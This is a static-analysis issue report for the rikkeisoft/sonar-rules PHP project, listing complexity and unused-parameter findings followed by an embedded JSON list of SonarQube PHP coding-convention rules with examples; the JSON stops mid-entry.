rikkeisoft/sonar-rules

Showing 275 of 275 total issues

Function execute has a Cognitive Complexity of 20 (exceeds 5 allowed). Consider refactoring.
Open

    protected function execute(InputInterface $input, OutputInterface $output)
    {
        /** @var \GuzzleHttp\Client $client */
        $client = $this->getContainer()['http-client'];
        $language = $input->getArgument('language');
Severity: Minor
Found in src/Commands/ListRulesCommand.php - About 2 hrs to fix

Cognitive Complexity

Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.

A method's cognitive complexity is based on a few simple rules:

  • Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
  • Code is considered more complex for each "break in the linear flow of the code"
  • Code is considered more complex when "flow breaking structures are nested"

Method execute has 64 lines of code (exceeds 25 allowed). Consider refactoring.
Open

    protected function execute(InputInterface $input, OutputInterface $output)
    {
        /** @var \GuzzleHttp\Client $client */
        $client = $this->getContainer()['http-client'];
        $language = $input->getArgument('language');
Severity: Major
Found in src/Commands/ListRulesCommand.php - About 2 hrs to fix

Avoid too many return statements within this method.
Open

        return 0;
Severity: Major
Found in src/Commands/ListRulesCommand.php - About 30 mins to fix

Function createCsv has a Cognitive Complexity of 6 (exceeds 5 allowed). Consider refactoring.
Open

    private function createCsv($data, $language)
    {
        ob_start();

        $resource = fopen('php://output', 'w');
Severity: Minor
Found in src/Commands/ListRulesCommand.php - About 25 mins to fix

Avoid unused parameters such as '$language'.
Open

    private function createCsv($data, $language)
Severity: Minor
Found in src/Commands/ListRulesCommand.php by phpmd

UnusedFormalParameter

Since: 0.2

Avoid passing parameters to methods or constructors and then not using those parameters.

Example

    class Foo
    {
        private function bar($howdy)
        {
            // $howdy is not used
        }
    }

Source https://phpmd.org/rules/unusedcode.html#unusedformalparameter

The method execute() has an NPath complexity of 6912. The configured NPath complexity threshold is 200.
Open

    protected function execute(InputInterface $input, OutputInterface $output)
    {
        /** @var \GuzzleHttp\Client $client */
        $client = $this->getContainer()['http-client'];
        $language = $input->getArgument('language');
Severity: Minor
Found in src/Commands/ListRulesCommand.php by phpmd

NPathComplexity

Since: 0.1

The NPath complexity of a method is the number of acyclic execution paths through that method. A threshold of 200 is generally considered the point where measures should be taken to reduce complexity.

Example

    class Foo {
        function bar() {
            // lots of complicated code
        }
    }

Source https://phpmd.org/rules/codesize.html#npathcomplexity

The method execute() has a Cyclomatic Complexity of 16. The configured cyclomatic complexity threshold is 10.
Open

    protected function execute(InputInterface $input, OutputInterface $output)
    {
        /** @var \GuzzleHttp\Client $client */
        $client = $this->getContainer()['http-client'];
        $language = $input->getArgument('language');
Severity: Minor
Found in src/Commands/ListRulesCommand.php by phpmd

CyclomaticComplexity

Since: 0.1

Complexity is determined by the number of decision points in a method plus one for the method entry. The decision points are 'if', 'while', 'for', and 'case labels'. Generally, 1-4 is low complexity, 5-7 indicates moderate complexity, 8-10 is high complexity, and 11+ is very high complexity.

Example

    // Cyclomatic Complexity = 11
    class Foo {
    1   public function example() {
    2       if ($a == $b) {
    3           if ($a1 == $b1) {
                    fiddle();
    4           } elseif ($a2 == $b2) {
                    fiddle();
                } else {
                    fiddle();
                }
    5       } elseif ($c == $d) {
    6           while ($c == $d) {
                    fiddle();
                }
    7       } elseif ($e == $f) {
    8           for ($n = 0; $n < $h; $n++) {
                    fiddle();
                }
            } else {
                switch ($z) {
    9               case 1:
                        fiddle();
                        break;
    10              case 2:
                        fiddle();
                        break;
    11              case 3:
                        fiddle();
                        break;
                    default:
                        fiddle();
                        break;
                }
            }
        }
    }

Source https://phpmd.org/rules/codesize.html#cyclomaticcomplexity

BUG found
Open

              window.data = {"total":112,"p":1,"ps":500,"rules":[{"key":"common-php:DuplicatedBlocks","repo":"common-php","name":"Source files should not have any duplicated blocks","htmlDesc":"An issue is created on a file as soon as there is at least one block of duplicated code on this file","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"common-php:FailedUnitTests","repo":"common-php","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"common-php:InsufficientCommentDensity","repo":"common-php","name":"Source files should have a sufficient density of comment lines","htmlDesc":"An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold. The number of comment lines to be written in order to reach the required threshold is provided by each issue message.","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"minimumCommentDensity","defaultValue":"25","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:InsufficientLineCoverage","repo":"common-php","name":"Lines should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the line coverage on this file is less than the required threshold. It gives the number of lines to be covered in order to reach the required threshold.","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"minimumLineCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:SkippedUnitTests","repo":"common-php","name":"Skipped unit tests should be either removed or fixed","htmlDesc":"Skipped unit tests are considered as dead code. 
Either they should be activated again (and updated) or they should be removed.","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S100","repo":"php","name":"Function names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][_a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nfunction DoSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Methods with an <code>@inheritdoc<\/code> annotation, as well as magic methods (<code>__construct()<\/code>, <code>__destruct()<\/code>,\n<code>__call()<\/code>, <code>__callStatic()<\/code>, <code>__get()<\/code>, <code>__set()<\/code>, <code>__isset()<\/code>, <code>__unset()<\/code>,\n<code>__sleep()<\/code>, <code>__wakeup()<\/code>, <code>__toString()<\/code>, <code>__invoke()<\/code>, <code>__set_state()<\/code>,\n<code>__clone()<\/code>, <code>__debugInfo()<\/code>) are ignored.<\/p>\n<pre>\nfunction __construct(){...}\nfunction __destruct(){...}\n\n\/**\n * {@inheritdoc}\n *\/\nfunction myFunc(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the function names against","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S101","repo":"php","name":"Class names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. 
This rule allows to check that all class\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass my_class {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the class names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S103","repo":"php","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"120","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S105","repo":"php","name":"Tabulation characters should not be used","htmlDesc":"<p>Developers should not need to configure the tab width of their text editors in order to be able to read source code.<\/p>\n<p>So the use of tabulation character must be banned.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1066","repo":"php","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n  if (condition2) {\n    ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1 &amp;&amp; condition2) {\n  ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1067","repo":"php","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&amp;&amp;<\/code>, <code>||<\/code> and 
<code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif ((($condition1 &amp;&amp; $condition2) || ($condition3 &amp;&amp; $condition4)) &amp;&amp; $condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ( (my_first_condition() || my_second_condition()) &amp;&amp; my_last_condition()) { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1068","repo":"php","name":"Unused \"private\" fields should be removed","htmlDesc":"<p>If a <code>private<\/code> field is declared but not used in the program, it can be considered dead code and should therefore be removed. This will\nimprove maintainability because developers will not wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass {\n  private $foo = 4;                       \/\/foo is unused\n\n  public function compute($a) {\n    return $a * 4;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n\n  public function compute($a) {\n    return $a * 4;\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S107","repo":"php","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 
parameters:<\/p>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4, $param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"},{"key":"constructorMax","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S108","repo":"php","name":"Nested blocks of code should not be left empty","htmlDesc":"<p>Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 42; $i++){}  \/\/ Empty on purpose or missing piece of code ?\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, this block is not considered to be empty.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1105","repo":"php","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (left and right curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1109","repo":"php","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. 
This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition) {\n  doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1116","repo":"php","name":"Empty statements should be removed","htmlDesc":"<p>Empty statements, i.e. <code>;<\/code>, are usually introduced by mistake, for example because:<\/p>\n<ul>\n  <li> It was meant to be replaced by an actual statement, but this was forgotten. <\/li>\n  <li> There was a typo which lead the semicolon to be doubled, i.e. <code>;;<\/code>. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  ;                                              \/\/ Noncompliant - was used as a kind of TODO marker\n}\n\nfunction doSomethingElse($p) {\n  echo $p;;                                      \/\/ Noncompliant - double ;\n}\n\nfor ($i = 1; $i &lt;= 10; doSomething($i), $i++);   \/\/ Noncompliant - Rarely, they are used on purpose as the body of a loop. It is a bad practice to have side-effects outside of the loop body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething() {}\n\nfunction doSomethingElse($p) {\n  echo $p;\n\n  for ($i = 1; $i &lt;= 10; $i++) {\n    doSomething($i);\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment provided that\n  the first character following the null statement is a white-space character. 
<\/li>\n  <li> MISRA C++:2008, 6-2-3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment, provided\n  that the first character following the null statement is a white-space character. <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7gCTAw\">CERT, MSC51-J.<\/a> - Do not place a semicolon immediately following an if, for,\n  or while condition <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/i4FtAg\">CERT, EXP15-C.<\/a> - Do not place a semicolon on the same line as an if, for,\n  or while statement <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1117","repo":"php","name":"Local variables should not have the same name as class fields","htmlDesc":"<p>Shadowing fields with a local variable is a bad practice that reduces code readability: it makes it confusing to know whether the field or the\nvariable is being used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n  public $myField;\n\n  public function doSomething() {\n    $myField = 0;\n    ...\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/2ADEAw\">CERT, DCL51-J.<\/a> - Do not shadow or obscure identifiers in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S112","repo":"php","name":"Generic exceptions ErrorException, RuntimeException and Exception should not be thrown","htmlDesc":"<p>If you throw a general exception type, such as ErrorException, RuntimeException, or Exception in a 
library or framework, it forces consumers to\ncatch all exceptions, including unknown exceptions that they do not know how to handle.<\/p>\n<p>Instead, either throw a subtype that already exists in the Standard PHP Library, or create your own type that derives from Exception.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthrow new Exception();  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nthrow new InvalidArgumentException();\n\/\/ or\nthrow new UnexpectedValueException();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/397.html\">MITRE, CWE-397<\/a> - Declaration of Throws for Generic Exception <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/BoB3AQ\">CERT, ERR07-J.<\/a> - Do not throw RuntimeException, Exception, or Throwable\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1124","repo":"php","name":"Modifiers should be declared in the correct order","htmlDesc":"<p>The PSR2 standard recommends listing modifiers in the following order to improve the readability of PHP source code:<\/p>\n<ol>\n  <li> final or abstract <\/li>\n  <li> public or protected or private <\/li>\n  <li> static <\/li>\n<\/ol>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstatic protected $foo;\n...\npublic static final function bar(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprotected static $foo;\n...\nfinal public static function bar(){...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1125","repo":"php","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($booleanVariable == true) { \/* ... *\/ }\nif ($booleanVariable != true) { \/* ... *\/ }\nif ($booleanVariable || false) { \/* ... 
*\/ }\ndoSomething(!false);\n\n$booleanVariable = condition ? true : exp;\n$booleanVariable = condition ? false : exp;\n$booleanVariable = condition ?  exp : true;\n$booleanVariable = condition ?  exp : false;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($booleanVariable) { \/* ... *\/ }\nif (!$booleanVariable) { \/* ... *\/ }\nif ($booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n\n$booleanVariable = condition || exp;\n$booleanVariable = !condition &amp;&amp; exp;\n$booleanVariable = !condition ||  exp;\n$booleanVariable = condition &amp;&amp; exp;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1126","repo":"php","name":"Return of boolean expressions should not be wrapped into an \"if-then-else\" statement","htmlDesc":"<p>Return of boolean literal statements wrapped into <code>if-then-else<\/code> ones should be simplified.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (expression) {\n  return true;\n} else {\n  return false;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn expression;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S113","repo":"php","name":"Files should contain an empty new line at the end","htmlDesc":"<p>Some tools such as Git work better when files end with an empty line.<\/p>\n<p>This rule simply generates an issue if it is missing.<\/p>\n<p>For example, a Git diff looks like this if the empty line is missing at the end of the file:<\/p>\n<pre>\n+class Test {\n+}\n\\ No newline at end of file\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1131","repo":"php","name":"Lines should not end with trailing whitespaces","htmlDesc":"<p>Trailing whitespaces are simply useless and should not stay 
in code. They may generate noise when comparing different versions of the same\nfile.<\/p>\n<p>If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the\nopportunity to do so. <\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1134","repo":"php","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide($numerator, $denominator) {\n  return $numerator \/ $denominator;              \/\/ FIXME denominator value might be  0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1135","repo":"php","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment 
<\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S114","repo":"php","name":"Interface names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all\ninterface names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\ninterface myInterface {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ninterface MyInterface {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the interface names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1142","repo":"php","name":"Functions should not contain too many return statements","htmlDesc":"<p>Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a\nreturn statement is encountered. 
This makes it harder to read and understand the logic of the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction myFunction(){ \/\/ Noncompliant as there are 4 return statements\n  if (condition1) {\n    return true;\n  } else {\n    if (condition2) {\n      return false;\n    } else {\n      return true;\n    }\n  }\n  return false;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed return statements per function","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1144","repo":"php","name":"Unused \"private\" methods should be removed","htmlDesc":"<p><code>private<\/code> methods that are never executed are dead code: unnecessary, inoperative code that should be removed. Cleaning out dead code\ndecreases the size of the maintained codebase, making it easier to understand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n  private function Foo() {}   \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n  public static function doSomething()\n  {\n    $foo = new Foo();\n    ...\n  }\n\n  private function unusedPrivateFunction() {  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n  private function Foo(){}   \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n  public static function doSomething()\n  {\n    $foo = new Foo();\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1145","repo":"php","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should 
be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n  <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n  <li> Some value was left unset. <\/li>\n  <li> Some logic is not doing what the programmer thought it did. <\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true) {  \/\/ Noncompliant\n  doSomething();\n}\n...\nif (false) {  \/\/ Noncompliant\n  doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomething();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S115","repo":"php","name":"Constant names should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. 
This rule checks that all constant names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$<\/code>:<\/p>\n<pre>\ndefine(\"const1\", true);\n\nclass Foo {\n    const const2 = \"bar\";\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndefine(\"CONST1\", true);\n\nclass Foo {\n    const CONST2 = \"bar\";\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the constant names against.","defaultValue":"^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1151","repo":"php","name":"\"switch case\" clauses should not have too many lines","htmlDesc":"<p>The <code>switch<\/code> statement should be used only to clearly define some new branches in the control flow. As soon as a <code>case<\/code>\nclause contains too many statements this highly decreases the readability of the overall control flow statement. 
In such case, the content of the\n<code>case<\/code> clause should be extracted into a dedicated method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 5:<\/p>\n<pre>\nswitch ($var) {\n  case 0:  \/\/ 6 lines till next case\n    methodCall1();\n    methodCall2();\n    methodCall3();\n    methodCall4();\n    break;\n  default:\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($var) {\n  case 0:\n    doSomething();\n    break;\n  default:\n    break;\n}\n\nfunction doSomething(){\n  methodCall1(\"\");\n  methodCall2(\"\");\n  methodCall3(\"\");\n  methodCall4(\"\");\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of lines","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S116","repo":"php","name":"Field names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that field\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass MyClass {\n  $my_field;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n  $myField;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the field names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S117","repo":"php","name":"Local variable and function parameter names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. 
This rule allows checking that all local\nvariable and function parameter names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\npublic function doSomething($my_param){\n  $LOCAL;\n  ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function doSomething($myParam){\n  $local;\n  ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1172","repo":"php","name":"Unused function parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the value passed to such parameters is, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething($a, $b) { \/\/ \"$a\" is unused\n  return compute($b);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($b) {\n  return compute($b);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Methods that override a parent class method or implement an interface method are ignored.<\/p>\n<pre>\nclass C extends B {\n\n  function doSomething($a, $b) {     \/\/ no issue reported on $b\n    compute($a);\n  }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  